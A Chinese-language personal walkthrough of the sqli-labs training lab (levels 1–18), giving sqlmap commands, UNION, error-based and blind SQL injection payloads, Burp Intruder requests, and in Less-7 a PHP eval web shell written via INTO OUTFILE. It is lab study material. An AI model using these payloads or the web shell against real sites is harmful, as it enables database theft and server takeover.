sqli-labs-basic通關記錄寶典

Less-1

date:2020-11-16 21:29:27

程序

根據題目提示：Please input the ID as parameter with numeric value ，注入點為id

sqlmap：

爆庫:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 --dbs --batch
爆表：
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security --tables --batch
爆欄位:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security -T users --columns --batch
爆欄位值:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security -T users -C id,password,username --dump --batch

拿到資料，別的表同理：
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

手工注入：

先小心翼翼地試一個id=1

http://www.sqli-labs.com/Less-1/
?id=1

哦豁，有資料回顯

Your Login name:Dumb
Your Password:Dumb

用orderby試一下要幾個欄位，但是發現隨便oderby都是一樣的回顯...

http://www.sqli-labs.com/Less-1/
?id=2 order by 110

中間試了好多都沒有給回應，加單引號報錯看一下sql陳述句，先入為主以為是數字型的了，明明題目也寫了...蠢爆了！！！

http://www.sqli-labs.com/Less-1/
?id=1'
輸出：
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

orderby試出來是要三個欄位，因為要閉合后面的單引號好麻煩就直接用#（URL編碼%23）注釋了后面的代碼，自己搞

http://www.sqli-labs.com/Less-1/
?id=1' order by 3 limit 1 %23
輸出：
Your Login name:Dumb
Your Password:Dumb

http://www.sqli-labs.com/Less-1/
?id=1' order by 4 limit 1 %23
輸出：
Unknown column '4' in 'order clause'

三個欄位，只輸出了兩個值，理所當然有一個id啦，所以第一個欄位隨便搞，后面兩個欄位用了輸出我們要的資料，一套流程走

爆庫，從mysql默認的資料庫information_schema里找所有的資料，使用group_concat拼接：
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
輸出：
第二個欄位是當前資料庫security，第三個欄位是輸出localhost所有的資料庫

爆表：
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema %23
輸出：
Your Login name:emails,referers,uagents,users
Your Password:3

爆欄位：
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23
輸出：
Your Login name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
Your Password:3

爆欄位值：
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(concat_ws('--',id,username,password)),3 from users+%23
輸出：
Your Login name:1--Dumb--Dumb,2--Angelina--I-kill-you,3--Dummy--p@ssword,4--secure--crappy,5--stupid--stupidity,6--superman--genious,7--batman--mob!le,8--admin--admin,9--admin1--admin1,10--admin2--admin2,11--admin3--admin3,12--dhakkan--dumbo,14--admin4--admin4
Your Password:3

總結

雖然我覺得閉合引號很麻煩，但是我就是還是想去試一下，直接在最后閉合就可以了，也不會報語法錯

http://www.sqli-labs.com/Less-1/
?id=1" order by 3 "

? 那為什么大家閉合的時候都喜歡用

?id=1' and '1'='1

畫面感地理解一下函式

concat_ws()是拼接一行的資料

group_concat()是拼接一列的資料
因為sql學的就很菜，有些語法函式什么的還要百度，mysql里information_schema里的，很多表名和欄位名經常搞混，手工注入的時候還要去看具體的表名和欄位名，超級浪費時間的，可是記一下吧很久不寫又忘記了，而且資料庫那么多，默認的表都不一樣，還是多寫題8
跑sqlmap的時候，會給出相應的payload，有些寫得真的超級復雜，說是為了繞過把，可是有個select就感覺繞不過去呀，等有一天我不再是一個連腳本都不會用的菜雞了，有機會的話，想去研讀一下原始碼

Less-2

data: 2020-11-17 10:32:43

程序

和less-1相比就是少閉合了兩個引號罷了

sqlmap

同Less-1

手工注入

判斷id是注入點且需要三個欄位：

payload:http://www.sqli-labs.com/Less-2?id=1 order by 4輸出：Unknown column '4' in 'order clause'payload:http://www.sqli-labs.com/Less-2?id=1 order by 3輸出：Your Login name:DumbYour Password:Dumb

和less-1一樣一套流程：

爆庫，第二個欄位拼接改連接所有資料庫名：http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata爆當前資料庫的表：http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema爆欄位：http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'爆欄位值：http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(concat_ws('--',username,password)),3 from users

總結

想當年我還是個不管寫什么題目都要看通過手冊的人，憶往昔崢嶸歲月稠

Less-3

date:2020-11-17 11:00:04

程序

sqlmap

同Less-1

手工注入

加單引號報錯，看后面具體要閉合啥

payload:

http://www.sqli-labs.com/Less-3?id=1asdf'kkkk

輸出，發現后面有括號啥的閉合一下，并且id也是字符型的：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'kkkk') LIMIT 0,1' at line 1

根據order by 判斷需要的欄位數是3個

payload:

http://www.sqli-labs.com/Less-3?id=-1') order by 4 --+http://www.sqli-labs.com/Less-3?id=-1') order by 3 --+

脫脫脫：

爆庫，第二個欄位拼接改連接所有資料庫名：http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata --+爆當前資料庫的表：http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema --+爆欄位：http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+爆欄位值：http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(concat_ws('--',username,password)),3 from users --+

總結

?id=1"竟然正常回傳資訊了！！！

因為id=xx('1"')了啊，根本沒閉合啊，有點弱智哦

Less-4

date:2020-11-17 11:25:45

程序

sqlmap

同Less-1

手工注入

發現雙引號報錯，所以可以直接在后面加 ") %23+ 進行閉合

http://www.sqli-labs.com/Less-4?id=1"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

根據order by確定是三個欄位后，union select拿資料

爆庫，第二個欄位拼接改連接所有資料庫名：http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+爆當前資料庫的表：http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema --+爆欄位：http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+爆欄位值：http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(concat_ws('--',username,password)),3 from users --+

總結

沒啥好說的

Less-5

date:2020-11-17 11:48:40

程序

sqlmap

同Less-1

手工注入

單引號報錯，payload

http://www.sqli-labs.com/Less-5?id=1'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

''1'' LIMIT 0,1'第一個單引號真的巨坑，總是眼糊看錯成SQL陳述句里面的

閉合單引號，用order by確定是提取了三個欄位，但是頁面上并沒有輸出欄位的值，目測是后臺進行了判斷

http://www.sqli-labs.com/Less-5?id=1' order by 3 +%23+輸出：You are in...........

前端沒有發現啥有用的東西，擼了一下floor報錯，開干

爆庫payload

http://www.sqli-labs.com/Less-5?id=1' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)AND '1'='1

然后像以前一樣的流程，在concat里面找自己要的資料就好了

總結

select count(*) from test group by floor(rand(0)*2)報錯原理666

概括一下:

floor(rand(0)*2)是隨機0、1，但是是偽隨機011011...

count(*)與group by共同作業時會建立一張虛擬表，兩個欄位(關鍵字和數量)

floor運算式第一次運算的值為0，在表中沒有找到key為0的資料，故插入，在插入的程序中需要再取一次group by后面的值（即再進行一次floor運算，結果為1），取到了1，將之插入，并將count(*)置1，

也就是說一次插入要呼叫兩次floor，所以在后面碰見01時，0沒有，插入1，但是1已經存在，報錯
payload是sqlmap復制后修改的，自己手動輸入的總是說有語法錯，我對著看了好多遍感覺沒有什么問題啊，無理取鬧，后來看報錯應該是and后面的select from的表要別名(Every derived table must have its own alias)，select from外面還要加一個括號

Less-6

data: 2020-11-17 15:50:40

程序

sqlmap

同Less-1

手工注入

輸入了less-5里面的payload，發現不報錯了！

機智的我去看sqlmap發現就是變成了閉合雙引號罷了唉，人傻了

爆當前庫payload:

http://www.sqli-labs.com/Less-6?id=1" AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)AND '1'="1

CONCAT(payload,floor(rand(0)*2))作為group by的key

總結

沒啥好總結的，還以為又有新東西可以看了

Less-7

date:2020-11-17 16:09:39

程序

sqlmap

同Less-1

sqlmap用的時間盲注，它自己跑著跑著連接就斷了，笑死

手工注入

試了一些，目測后臺做了判斷

sql報錯統一輸出：

You have an error in your SQL syntax

正常輸出：You are in.... Use outfile......

盲注的話，二分法判斷字符的ascii碼值，sqlmap都說它扛不住了

看見正常輸出那里有個use outfile......，感覺是個提示，新東西就要百度看看，好叭這里直接看通關秘籍了，竟然直接寫入檔案getshell了......

太帥了，動手擼一遍

要上傳一句話連接的話，需要知道路徑，去有回顯的題拿路徑啦

basedir 引數指定了安裝 MySQL 的安裝路徑

datadir 引數指定了 MySQL 的資料庫檔案放在什么路徑下

payload:

http://www.sqli-labs.com/Less-1/?id=-1' union select 1,@@datadir,@@basedir MYSQL %23+

輸出，并沒有phpstudy的路徑，因為我根本沒用phpstudy的資料庫...：

Your Login name:C:\ProgramData\MySQL\MySQL Server 5.5\Data\Your Password:C:/Program Files (x86)/MySQL/MySQL Server 5.5/

嘗試在獲取到的路徑下存入php一句話：

http://www.sqli-labs.com/Less-7/?id=1 union select '<?php eval(@_POST["haha"]); ?>' into outfile 'C:/ProgramData/MySQL/MySQL Server 5.5/Data/haha.php' %23+

但是一直報錯，憤怒地直接去mysql運行的時候，發現報錯：

[SQL] select '<?php eval(@_POST["haha"]); ?>' into outfile 'C:/haha.php'[Err] 1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

去查了一下報錯原因：

將桌面檔案存盤到mysql時報錯：The MySQL server is running with the --secure-file-pri option so it cannot execute this.報錯原因：mysql檔案的匯入和匯出路徑有默認的設定，即 secure-file-priv,當傳入的csv檔案路徑與默認的路徑沖突時就會報錯，secure-file-priv的值有三種情況：secure_file_prive=null ––限制mysqld 不允許匯入匯出secure_file_priv=/path/ – --限制mysqld的匯入匯出只能發生在默認的/path/目錄下secure_file_priv=’’ – --不對mysqld 的匯入 匯出做限制

通過命令 select @@secure_file_priv 查詢，發現secure_file_priv的值為null，也就是說不允許匯入匯出

于是到mysql的安裝目錄下修改my.ini組態檔，在mysqld節點下加入secure_file_priv=''，對匯入匯出不進行限制

在嘗試payload時，

?id=1 order by 111111 %23+不報錯

?id=1' order by 111111 %23+報錯

?id=1" order by 111111 %23+不報錯

說明有一個單引號要閉合

?id=1' order by 1 %23+報錯

?id=1')) order by 3 %23+不報錯

?id=1')) order by 4 %23+報錯

閉合成功，且需要三個欄位

payload：

http://www.sqli-labs.com/Less-7?id=1')) union select '<?php @eval($_POST["haha"]); ?>',2,3 into outfile 'D:/haha.php' %23+

雖然輸出還是報錯，但是檔案已經上傳到D盤了（因為這個sql陳述句我已經在資料庫試了很多遍了...）

但是因為我的mysql不是PHPstudy的，所以沒有搞到phpstudy的路徑，沒有上傳到phpstudy目錄下，也連接不上決議不了？

機智的我決定手動復制到www下

上蟻劍連接成功

另外要看資料庫資料的話可以通過改上面的p輸出檔案，然后上蟻劍查看輸出的檔案內容，其余的爆資料庫和之前的題目都一樣的流程，例如爆當前資料庫名：

http://www.sqli-labs.com/Less-7?id=1')) union select database(),2,3 into outfile 'D:/haha.php' %23+

因為用命令列登錄資料庫需要密碼

總結

MySQL的@與@@區別

@x 是用戶自定義的變數 (User variables are written as @var_name)

@@x 是 global或session變數 (@@global @@session )
菜雞的悲哀就是做個題還要靠作弊

Less-8

date:2020-11-21 13:58:47

程序

sqlmap

同less-1，看見sqlmap的payload，它也是盲注咯

手工注入

單引號閉合后分別order by 3和4，發現一個正常輸出一個不輸出，說明單引號閉合成功，order by執行成功，且需要三個欄位，payload：

http://www.sqli-labs.com/Less-8?id=1' order by 3 %23+http://www.sqli-labs.com/Less-8?id=1' order by 4 %23+

沒有回顯資料，只能盲注

嘗試第七關的outfile上傳檔案，上傳成功，上蟻劍連接

換個思路，上盲注，看題目是布爾盲注，一個一個猜唄，機智的我決定先測驗出長度再上bp爆

length()函式，顯而易見是回傳里面引數的長度

substr(a,b,c)函式，顯而易見是截斷字串a，b位置開始截取c個字符

payload:

http://www.sqli-labs.com/Less-8?id=1' and (select length(database()))=8 %23+

=8時正常輸出，說明當前資料庫名字長度為8

上bp, 選中Intruder

攻擊模式可以選sniper也可以選clusterbomb，都很方便，字典直接用excel下拉到127的...，一個一個打也太費勁了把

從1到127一個一個猜資料庫名中的字符，根據回傳資料的長度不同找到正確的ascii碼值：

GET /Less-8/?id=1%27%20and%20(select%20ascii(substr(database(),§1§,1)))=§115§%20%23+ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache

這里就不上bp圖了，不好搞，用的笛卡爾乘積，發了一千多個請求就爆了個當前資料庫名，要爆別的在上面payload改改完事：

request	payload1	payload2	status	timeout	error	length
0			200	false	false	950
787	3	99	200	false	false	950
802	2	101	200	false	false	950
838	6	105	200	false	false	950
909	5	114	200	false	false	950
913	1	115	200	false	false	950
927	7	116	200	false	false	950
932	4	117	200	false	false	950
968	8	121	200	false	false	950
1	1	1	200	false	false	966
2	2	1	200	false	false	966
3	3	1	200	false	false	966
4	4	1	200	false	false	966
5	5	1	200	false	false	966
6	6	1	200	false	false	966

總結

盲注一個個手打的話就是很費時間，疲憊

有sqlmap真好

Less-9

date：2020-11-21 15:10:01

程序

sqlmap

同less-1

手工注入

不管輸入什么都是正常輸出，明明輸入的id資料庫里面就沒有，還說you are in，用戶體驗差評：

Welcome    DhakkanYou are in...........

利用 if() 函式進行時間盲注，發現閉合單引號的時候它就一直睡覺咯

payload:

http://www.sqli-labs.com/Less-9?id=1' and if((1=2),1,sleep(2333)) %23

和布爾盲注類似，但是是根據服務器回應的時間長短進行判斷了，開干

payload:

http://www.sqli-labs.com/Less-9?id=1' and if((length(database())=8),sleep(2333),1) %23

判斷出database()的長度是8個字符，還是接著上bp：

GET /Less-9/?id=1%27%20and%20if((ascii(substr(database(),§1§,1))=§115§),sleep(11),1)%20%23 HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache

bp的result，根據ascii值就可以吧當前資料名弄出來了：

request	payload1	payload2	status	timeout	error	length
0			200	false	false	988
787	3	99	200	false	false	988
802	2	101	200	false	false	988
838	6	105	200	false	false	988
909	5	114	200	false	false	988
913	1	115	200	false	false	988
927	7	116	200	false	false	988
932	4	117	200	false	false	988
968	8	121	200	false	false	988
1	1	1	200	false	false	951
2	2	1	200	false	false	951
3	3	1	200	false	false	951
4	4	1	200	false	false	951

總結

其實想節省時間可以去看資料庫的命名規范，確定要測驗的字符有哪些，這樣在進行大量資料測驗的時候會節省一些時間

Less-10

date：2020-11-21 15:55:10

程序

sqlmap

同less-1

手工注入

和less-9相比就是單引號閉合變成了雙引號閉合

用這個payload，服務器就睡覺啦：

http://www.sqli-labs.com/Less-10?id=1" and if((1=1),sleep(2333),1) %23+

后面的流程和less-9一樣

總結

遇到這個題目也不知道是該開心還是該開心

Less-11

date：2020-11-21 16:23:25

程序

寫完時間盲注的我，看見這道題目，眼前一亮！終于換題目啦哈哈哈哈哈哈哈嗝

sqlmap

sqlmap測post請求可以用引數forms

這里用的--forms引數，直接搞到所有資料庫了：

py sqlmap.py -u http://www.sqli-labs.com/Less-11 --forms --dbs --batch

后面爆欄位值改引數就可以了，同less-1

手工注入

看見登錄框就想admin/123456登錄（竟然失敗了！氣人！）

抓包看見的是post請求，所以不能和之前一樣直接在url后面接引數了，那就在輸入框直接注入哈哈哈

payload，username最后面有個空格，不加空格注釋符號和后面的符號連接在一起，就起不到注釋的功能啦:

Username :    admin' or 1=1 -- Password :    123456

輸出：

Your Login name:DumbYour Password:Dumb

有資料回顯，舒服了

上bp抓包，直接改后面的引數，根據order by確定需要兩個欄位：

POST /Less-11/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-11/Content-Type: application/x-www-form-urlencodedContent-Length: 51Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin%27 order by 2+--+&passwd=&submit=Submit

輸出，竟然真的有一個admin/admin...：

<br>Your Login name:admin<br>Your Password:admin<br>

爆資料庫payload：

uname=zhatian%27 union select 1,group_concat(schema_name) from information_schema.schemata+--+&passwd=&submit=Submit

輸出：

<br>Your Login name:1<br>Your Password:information_schema,bookstore,challenges,dvwa,edusys,exam,fresh,hotel,hy,hy2,mysql,news,pentest,performance_schema,pikachu,security,store,student,test,vote<br>

爆表payload:

uname=zhatian%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()+--+&passwd=&submit=Submit

輸出：

<br>Your Login name:1<br>Your Password:emails,referers,uagents,users<br

爆欄位:

uname=zhatian%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'+--+&passwd=&submit=Submit

輸出：

<br>Your Login name:1<br>Your Password:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password<br>

爆欄位值:

uname=zhatian%27 union select 1,group_concat(concat_ws('--',username,password)) from users +--+&passwd=&submit=Submit

輸出：

<br>Your Login name:1<br>Your Password:Dumb--Dumb,Angelina--I-kill-you,Dummy--p@ssword,secure--crappy,stupid--stupidity,superman--genious,batman--mob!le,admin--admin,admin1--admin1,admin2--admin2,admin3--admin3,dhakkan--dumbo,admin4--admin4<br

后面的都是常規操作了

總結

sqlmap測post請求可以用引數forms，直接獲取表單，可以使用-r引數讀取請求檔案，或者通過--data引數測驗，具體情況具體百度

-r讀取的檔案可以用bp抓包，右鍵copy to file，直接匯出txt檔案

Less-12

程序

date：2020-11-21 17:21:22

sqlmap

同less-11

手工注入

上bp抓包

發現雙引號報錯，payload：

uname=admin"+or+1%3D1+--+&passwd=1234&submit=Submit

輸出：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

我？？？

生氣的亂搞了:

uname=admin"5678+or+1%3D1+--+&passwd=1234&submit=Submit

輸出：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5678 or 1=1 -- ") and password=("1234") LIMIT 0,1' at line 1

這下出來了把，后面是")，再加個括號閉合一下下，分別order by2和3，確定是兩個欄位

uname=admin123455")+order by 3--+&passwd=1234&submit=Submit

輸出當前資料庫~

uname=admin123455")+union select 1,database()--+&passwd=1234&submit=Submit

輸出：

<br>Your Login name:1<br>Your Password:security<br>

后續操作參考less-11

總結

和上一關比就是單引號閉合變成")閉合了，和前面十關做的題目一樣呀，后面不會還是一樣的吧，然后寫完盲注就沒了把

唉，我覺得我的專注力有點不太夠，才寫了幾道題啊，還花了這么長時間，真是廢物

Less-13

date：2020-11-21 18:08:01

程序

sqlmap

同less-11

手工注入

盲猜這題是 ')) 閉合，payload：

uname=admin%27%29%29+or+1%3D1+--+23&passwd=32&submit=Submit

輸出：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') or 1=1 -- 23') and password=('32') LIMIT 0,1' at line 1

哦豁，是 ') 閉合，生氣！閉合：

uname=admin') or 1=1+--+23&passwd=32&submit=Submit

輸出只有一張圖片，表示閉合成功，沒有資料回顯

那就用報錯來看資料唄，正好報錯注入的函式我用的少

extractvalue(目標xml檔案，xml路徑)用于查詢xml檔案

第二個引數 xml中的位置是可操作的地方，xml檔案中查找字符位置是用 /xxx/xxx/xxx/…這種格式，如果我們寫入其他格式，就會報錯，并且會回傳我們寫入的非法格式內容，而這個非法的內容就是我們想要查詢的內容

payload：

uname=admin') and extractvalue(1,concat('~',database()))+--+23&passwd=32&submit=Submit

輸出得到當前資料庫名：

XPATH syntax error: '~security

拿別的資料在xml路徑那里改payload即可，參考less-11

總結

十種sql報錯注入姿勢總結

Less-14

date：2020-11-21 19:47:21

程序

sqlmap

同less-11

手工注入

直接雙引號閉合了，payload：

uname=admin" order by 666+--+&passwd=123&submit=Submit

輸出：

Unknown column '666' in 'order clause'

能閉合了就隨便用之前的哪個方法拿資料都可以啦，用報錯注入拿個資料庫名：

uname=admin" and extractvalue(1,concat('~',database()))+--+&passwd=123&submit=Submit

輸出：

XPATH syntax error: '~security'

別的同Less-11

總結

這，沒啥

Less-15

date：2020-11-21 20:03:27

程序

sqlmap

同less-11

手工注入

看標題，布爾盲注，行叭，上bp抓包

單引號閉合后接order by 2，給的是flag.jpg

接order by 2，給的是slap.jpg

明顯flag.jpg的就是登陸成功嘛

說明單引號閉合成功且需要的是兩個欄位：

uname=admin' order by 3+--+&passwd=&submit=Submit

還是先利用if判斷，把資料庫名字長度搞出來，利用一下payload，服務器沉睡了好一會才醒來，那么長度就是8啦！

uname=admin' and if( length(database())=8,sleep(23),1 )+--+&passwd=&submit=Submit

一個一個字符猜，這種搬磚的活還是交給bp把

右鍵send to Intruder，attack type選cluster bomb:

POST /Less-15/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-15/Content-Type: application/x-www-form-urlencodedContent-Length: 81Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin' and if( ascii(substr(database(),§1§,1))=§8§,sleep(23),1 )+--+&passwd=&submit=Submit

第一個引數從1-8，第二個引數從1-127，最后根據ascii值把資料庫名拖出來，爆欄位參考less-11

request	payload1	payload2	status	timeout	error	length
787	3	99	200	false	false	1691
802	2	101	200	false	false	1691
838	6	105	200	false	false	1691
909	5	114	200	false	false	1691
913	1	115	200	false	false	1691
927	7	116	200	false	false	1691
932	4	117	200	false	false	1691
968	8	121	200	false	false	1691
0			200	false	false	1737
2	2	1	200	false	false	1737
1	1	1	200	false	false	1737
3	3	1	200	false	false	1737

總結

Less-16

date：2020-11-21 22:33:47

程序

sqlmap

同less-11

手工注入

username輸入admin") or 1=1 -- 直接登錄成功，不要忘記--后面的空格哈

因為可以根據圖片的顯示判斷，所以其實時間盲注還是布爾盲注都是可以的呀，只是前面那道題用過布爾盲注了，這里就用時間盲注

老規矩先判斷資料庫長度是8：

admin") and length(database())=8 --

然后搬磚找bp，send to Intruder：

POST /Less-16/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-16/Content-Type: application/x-www-form-urlencodedContent-Length: 78Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheunameadmin") and if(ascii(substr(database(),§1§,1))=§8§,slepp(23),1)--+&passwd=&submit=Submit

第一個引數從1-8，第二個引數從1-127，最后根據ascii值把資料庫名拖出來，爆欄位參考less-11

request	payload1	payload2	status	timeout	error	length
787	3	99	200	false	false	1712
802	2	101	200	false	false	1712
838	6	105	200	false	false	1712
909	5	114	200	false	false	1712
913	1	115	200	false	false	1712
927	7	116	200	false	false	1712
932	4	117	200	false	false	1712
968	8	121	200	false	false	1712
0			200	false	false	1749
1	1	1	200	false	false	1749

總結

bp真好，sqlmap真好，搬磚真難

Less-17（sqlmaping）

date：2020-11-21 22:54:56

程序

看見題目又開心了起來，不是盲注啦

sqlmapbp抓包右鍵copy to file生成17.txt

python sqlmap.py -r 17.txt --risk=3 --dbs --batch

后續同less-11

手工注入

username輸入admin' or 1=1 --

竟然回傳bug off，you silly dump hacker

哦豁，罵我，我要干你，等著

我懷疑后臺判斷了用戶輸入，然后無數次嘗試無數次被罵，我決定偷偷看一下原始碼

原始碼中對uname限制了只能15個字符，單是這個就已經很無力了，后來看完原始碼才發現這是一個重置密碼的表單，而且原始碼中并沒有對passwd做限制

眼瞎的我決定用時間盲注，bp send to repeater：

uname=admin&passwd=1' where 1=1 and if( length(database())=8,sleep(10),1 )--+&submit=Submit

哈哈服務器睡著啦，隨后時間盲注就可以了，和上面的題目一樣

總結

感覺用得多的還是盲注

盲注手工注入最快就是用二分法，但是我是有bp的人！

--risk=RISK 風險（1-4，默認1）升高風險等級會增加資料被篡改的風險，risk 2：基于事件的測驗;risk 3：or陳述句的測驗;risk 4：update的測驗

Less-18

date：2020-11-22 00:19:07

程序

題目提示，Your IP ADDRESS is: 127.0.0.1，這題我會！肯定是xff頭注入！（結果不是）

sqlmap

bp抓包右鍵copy to file生成18.txt

python sqlmap.py -r 18.txt --level=5 --risk=3 --dbs --batch

后續同less-11

手工注入

既然不是xff頭，那就看一下原始碼把

原始碼中對賬戶密碼進行了判斷，必須要繞過去才能進行頭注入，剛好上一題重置了密碼

那么就輸入相應的賬戶密碼，再在user-agent上注入就好啦，先來個單引號報錯：

POST /Less-18/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-18/Content-Type: application/x-www-form-urlencodedContent-Length: 34Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

輸出：

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1<br><br><img src="https://img.uj5u.com/2021/06/25/245935250618121.jpg"  /><br>

講道理這里肯定是插入操作，那就是insert注入咯，原始碼確實是insert，其實不管是什么注入，只要能大概弄sql陳述句，順利讓資料庫執行我們的代碼即可

拿database()這里利用報錯注入，payload：

POST /Less-18/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',1,extractvalue(1,concat('~',database())))# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-18/Content-Type: application/x-www-form-urlencodedContent-Length: 34Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

輸出，拿到當前資料庫security：

